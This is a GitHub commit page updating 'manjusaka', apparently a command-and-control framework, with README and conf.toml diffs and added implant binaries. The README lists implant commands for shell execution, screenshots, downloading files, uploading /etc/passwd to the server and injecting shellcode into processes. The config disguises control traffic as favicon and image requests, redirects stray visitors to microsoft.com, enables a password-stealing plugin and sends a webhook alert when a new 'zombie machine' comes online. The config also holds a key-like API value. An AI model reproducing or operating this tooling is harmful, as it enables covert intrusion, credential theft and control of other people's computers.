Skip to content

Commit b5a6e96

Browse files
author
ydhcui
committed
update 0.8
1、获取真实公网地址、并展示IP归属 , 密码加密,上线提醒功能 2、支持cdn上线,加入代理上线功能 修复host头问题 3、默认获取所有历史npc上线列表 4、修复其它bug
1 parent e8cb916 commit b5a6e96

File tree

12 files changed

+5797
-2719
lines changed

12 files changed

+5797
-2719
lines changed

README.md

Lines changed: 18 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -37,13 +37,15 @@
3737

3838
新建项目 配置需要填写以下项:
3939

40-
项目名称: 随便写 hvv2022
40+
项目名称: 随便写 如:hvv2022
4141

4242
回调地址: 外网IP和端口 http://12.34.56.78:8080
4343

4444
上线域名: cdn域名 如果没有上cdn则填写和回调地址一样
4545

46-
Host : cdn上线时所需要的host请求头
46+
Host头 : cdn上线时所需要的host请求头
47+
48+
代理地址: NPC上线时如果需要走代理,在这里配置。比如我测试用的clash,代理配置为http://192.168.93.1:7890
4749

4850
其它都会默认生成,点击确定更新之后需要刷新列表重新启用项目状态。
4951

@@ -86,11 +88,12 @@ ls 枚举文件 eg: ls /
8688
cd 切换目录 eg: cd /
8789
sh 执行系统命令 eg: sh ps -aux , sh tasklist
8890
cat 读取文本 cat a.txt
89-
screen 执行截屏 screen (可能会报毒。。待优化)
90-
wget 下载文件 eg: wget http://192.168.1.1/a.txt <a.txt> 文件名可选 默认当前
91-
start 执行插件可执行文件 eg: start name <args> 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
92-
pl 执行插件 eg: pl plugname <plugargs> 需要插件在plugins目录下
93-
inject 注入进程 eg: inject pid <shellcodeurl> shellcodeurl可选 默认下载当前shellcode下载链接
91+
screen 执行截屏 screen
92+
wget 下载文件 eg: wget http://192.168.1.1/a.txt <a.txt> 文件名可选 默认当前
93+
put 上传文件 eg: put /etc/passwd 将passwd文件上传到nps服务器
94+
start 执行插件可执行文件 eg: start name <args> 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
95+
pl 执行插件 eg: pl plugname <plugargs> 需要插件在plugins目录下
96+
inject 注入进程 eg: inject pid <shellcodeurl> shellcodeurl可选 默认下载当前shellcode下载链接
9497
9598
9699
```
@@ -200,8 +203,15 @@ message PlugResult {
200203

201204
## 更新
202205

203-
### todo
206+
### v0.8
207+
1、获取真实公网地址、并展示IP归属 , 密码加密,上线提醒功能
208+
209+
2、支持cdn上线,加入代理上线功能 修复host头问题
204210

211+
3、默认获取所有历史npc上线列表
212+
213+
4、修复其它bug
214+
205215

206216
### v0.7
207217
1、新增shellcode加载方式,新增系统位数区分

conf.toml

Lines changed: 27 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,7 @@ npcport = ":80"
99
#NPU后台地址
1010
npuaddr = "manjusaka"
1111

12-
#主交互路由,遵守gin路由规则 后端会读取target的值(最终url总长不能超64)
12+
#主交互路由,遵守gin路由规则 后端会读取target的值
1313
npcroute = "/:target/favicon.ico"
1414

1515
#npc母体下载路由,遵守gin路由规则 后端会读取target目标、sys母体类型、type系统位数的值
@@ -18,6 +18,9 @@ downroute = "/:target/assert/:sys/:type/bg.jpg"
1818
#非法请求时的转发地址
1919
redirect = "http://www.microsoft.com"
2020

21+
#nps调用tx接口获取ip归属 https://apis.map.qq.com/ws/location/v1/ip
22+
qqmapkey = "EIMBZ-RBNH4-NZQUG-X7RKQ-3SPPH-YSFCX"
23+
2124
[fileservice]
2225
#文件服务地址 默认开启本地服务
2326
server = ""
@@ -28,3 +31,26 @@ route = "/images/:fid/logo.png"
2831
#fid有效时间(秒)
2932
fidtimeout = 3600
3033

34+
35+
[plug.getpass]
36+
args = "all"
37+
38+
39+
[webhook] #新上线机器时构造该hook
40+
#目前只支持POST
41+
method = "POST"
42+
43+
url = "https://wxpusher.zjiecode.com/api/send/message"
44+
45+
headers = "Content-Type:application/json" #多个header以\n分割
46+
47+
body = """{
48+
"appToken":"AT_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
49+
"content":"{Projname} {Projroute} \\n{Username} {Hostname} \\n{Intranet} {Internet} \\n{Pid} {Process}",
50+
"summary":"您有新的肉鸡上线啦!{Username} {Hostname}",
51+
"contentType":3,
52+
"uids":["UID_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]}"""
53+
54+
55+
56+

manjusaka

140 KB
Binary file not shown.

plugins/libnpc.a

Lines changed: 5752 additions & 2710 deletions
Large diffs are not rendered by default.

plugins/libnpc.so

440 KB
Binary file not shown.

plugins/npc

448 KB
Binary file not shown.

plugins/npc.dll

338 KB
Binary file not shown.

plugins/npc.exe

348 KB
Binary file not shown.

plugins/plug_getpass_nps.dll

130 KB
Binary file not shown.

plugins/plug_qvte_nps.exe

-188 KB
Binary file not shown.

plugins/x86/npc.dll

380 KB
Binary file not shown.

plugins/x86/npc.exe

389 KB
Binary file not shown.

0 commit comments

Comments
 (0)